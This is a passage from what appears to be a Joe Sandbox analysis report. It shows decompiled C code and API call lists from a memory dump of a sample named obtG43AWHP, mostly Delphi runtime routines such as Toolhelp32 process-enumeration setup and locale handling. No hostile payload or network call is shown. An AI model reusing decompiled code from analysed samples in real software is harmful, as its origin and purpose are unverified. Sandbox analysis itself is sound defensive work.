    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}






























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}












    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}






    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
